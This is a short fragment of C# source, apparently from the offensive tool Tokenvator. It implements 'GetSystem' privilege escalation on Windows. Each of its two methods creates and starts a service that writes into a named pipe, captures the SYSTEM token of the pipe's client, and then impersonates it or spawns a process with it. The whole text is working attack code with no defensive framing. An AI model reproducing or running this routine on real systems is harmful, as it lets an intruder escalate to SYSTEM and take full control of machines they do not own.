//////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// internal static void GetSystem(String command, String arguments) { Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator")); using (PSExec psExec = new PSExec("Tokenvator")) { psExec.Connect("."); psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator"); psExec.Open(); thread.Start(); waitHandle.WaitOne(); psExec.Start(); psExec.Stop(); } thread.Join(); Create createProcess; if (0 == System.Diagnostics.Process.GetCurrentProcess().SessionId) { createProcess = CreateProcess.CreateProcessWithLogonW; } else { createProcess = CreateProcess.CreateProcessWithTokenW; } createProcess(hToken, command, arguments); }
//////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// internal static void GetSystem() { Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator")); using (PSExec psExec = new PSExec("Tokenvator")) { psExec.Connect("."); psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator"); psExec.Open(); thread.Start(); waitHandle.WaitOne(); psExec.Start(); psExec.Stop(); } thread.Join(); if (IntPtr.Zero != hToken) { advapi32.ImpersonateLoggedOnUser(hToken); kernel32.CloseHandle(hToken); Console.WriteLine("[+] Operating as {0}", System.Security.Principal.WindowsIdentity.GetCurrent().Name); hToken = IntPtr.Zero; } }